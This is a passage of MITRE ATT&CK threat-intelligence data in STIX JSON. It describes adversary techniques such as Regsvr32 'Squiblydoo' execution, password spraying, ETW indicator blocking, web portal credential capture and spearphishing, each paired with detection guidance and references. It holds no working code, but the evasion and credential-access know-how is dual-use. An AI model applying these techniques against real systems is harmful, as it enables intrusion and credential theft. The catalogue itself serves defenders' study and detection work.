subkeys.\n\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--68c96494-1a50-403e-8844-69a6af278c68", "created": "2017-05-31T21:30:42.222Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1042", "external_id": "T1042"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/556.html", "external_id": "CAPEC-556"}, {"source_name": "Microsoft Change Default Programs", "description": "Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.", "url": "https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs"}, {"source_name": "Microsoft File Handlers", "description": "Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.", "url": "http://msdn.microsoft.com/en-us/library/bb166549.aspx"}, {"source_name": "Microsoft Assoc Oct 2017", "description": "Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.", "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/assoc"}, {"source_name": "TrendMicro TROJ-FAKEAV OCT 2012", "description": "Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.", "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Regsvr32", "description": "Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Casey Smith"], "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_defense_bypassed": ["Process whitelisting", "Anti-virus", "Digital Certificate Validation"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "created": "2017-05-31T21:31:26.966Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1117", "external_id": "T1117"}, {"source_name": "Microsoft Regsvr32", "description": "Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.", "url": "https://support.microsoft.com/en-us/kb/249873"}, {"source_name": "LOLBAS Regsvr32", "description": "LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"}, {"source_name": "Carbon Black Squiblydoo Apr 2016", "description": "Nolen, R. et al.. (2016, April 28). Threat Advisory: \u201cSquiblydoo\u201d Continues Trend of Attackers Using Native OS Tools to \u201cLive off the Land\u201d. Retrieved April 9, 2018.", "url": "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/"}, {"source_name": "FireEye Regsvr32 Targeting Mongolian Gov", "description": "Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-03-07T14:33:34.201Z", "name": "Password Spraying", "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Microsoft Threat Intelligence Center (MSTIC)", "John Strand"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.\n\nConsider the following event IDs:(Citation: Trimarc Detecting Password Spraying)\n\n* Domain Controllers: \"Audit Logon\" (Success & Failure) for event ID 4625.\n* Domain Controllers: \"Audit Kerberos Authentication Service\" (Success & Failure) for event ID 4771.\n* All systems: \"Audit Logon\" (Success & Failure) for event ID 4648.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "created": "2020-02-11T18:39:25.122Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1110/003", "external_id": "T1110.003"}, {"source_name": "Trimarc Detecting Password Spraying", "description": "Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.", "url": "https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing"}, {"source_name": "BlackHillsInfosec Password Spraying", "description": "Thyer, J. (2015, October 30). Password Spraying & Other Fun with RPCCLIENT. Retrieved April 25, 2017.", "url": "http://www.blackhillsinfosec.com/?p=4645"}, {"source_name": "US-CERT TA18-068A 2018", "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:19:08.953Z", "name": "External Proxy", "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "created": "2020-03-14T23:12:18.466Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1090/002", "external_id": "T1090.002"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Trend Micro APT Attack Tools", "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-03-30T21:01:46.711Z", "name": "Web Portal Capture", "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}, {"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["An externally facing login portal is configured."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "created": "2020-02-11T18:59:50.058Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1056/003", "external_id": "T1056.003"}, {"source_name": "Volexity Virtual Private Keylogging", "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.", "url": "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-10-21T14:30:10.979Z", "name": "Email Addresses", "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", "created": "2020-10-02T14:56:24.866Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1589/002", "external_id": "T1589.002"}, {"source_name": "Azure Active Directory Reconnaisance", "description": "Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.", "url": "https://o365blog.com/post/just-looking/"}, {"source_name": "GitHub Office 365 User Enumeration", "description": "gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022.", "url": "https://github.com/gremwell/o365enum"}, {"source_name": "GrimBlog UsernameEnum", "description": "GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.", "url": "https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/"}, {"source_name": "HackersArise Email", "description": "Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.", "url": "https://www.hackers-arise.com/email-scraping-and-maltego"}, {"source_name": "CNET Leaks", "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.", "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Re-opened Applications", "description": "Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6a3be63a-64c5-4678-a036-03ff8fc35300", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1164", "external_id": "T1164"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Indicator Blocking", "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Rob Smith"], "x_mitre_detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\n\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME\\{PROVIDER_GUID}\n\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Anti-virus", "Log analysis", "Host intrusion prevention systems"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df", "created": "2017-05-31T21:30:47.384Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1054", "external_id": "T1054"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/571.html", "external_id": "CAPEC-571"}, {"source_name": "Microsoft Lamin Sept 2017", "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.", "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"}, {"source_name": "Microsoft About Event Tracing 2018", "description": "Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.", "url": "https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events"}, {"source_name": "Medium Event Tracing Tampering 2018", "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.", "url": "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-09-08T21:03:35.477Z", "name": "Spearphishing Voice", "description": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \"vishing\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)\n\nVictims may also receive phishing messages that direct them to call a phone number (\"callback phishing\") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289", "created": "2023-09-07T21:48:39.516Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1598/004", "external_id": "T1598.004"}, {"source_name": "Avertium callback phishing", "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.", "url": "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing"}, {"source_name": "BOA Telephone Scams", "description": "Bank of America. (n.d.). How to avoid telephone scams. Retrieved September 8, 2023.", "url": "https://business.bofa.com/en-us/content/what-is-vishing.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Redundant Access", "description": "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nAdversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated. \n\nIf one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_deprecated": true, "x_mitre_detection": "Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.\n\nDetection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.\n\nIf an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.\n\nFor alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS"], "x_mitre_version": "3.1", "x_mitre_defense_bypassed": ["Network intrusion detection system", "Anti-virus"], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6aabc5ec-eae6-422c-8311-38d45ee9838a", "created": "2017-05-31T21:31:18.867Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1108", "external_id": "T1108"}, {"source_name": "Mandiant APT1", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Spearphishing Attachment", "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", 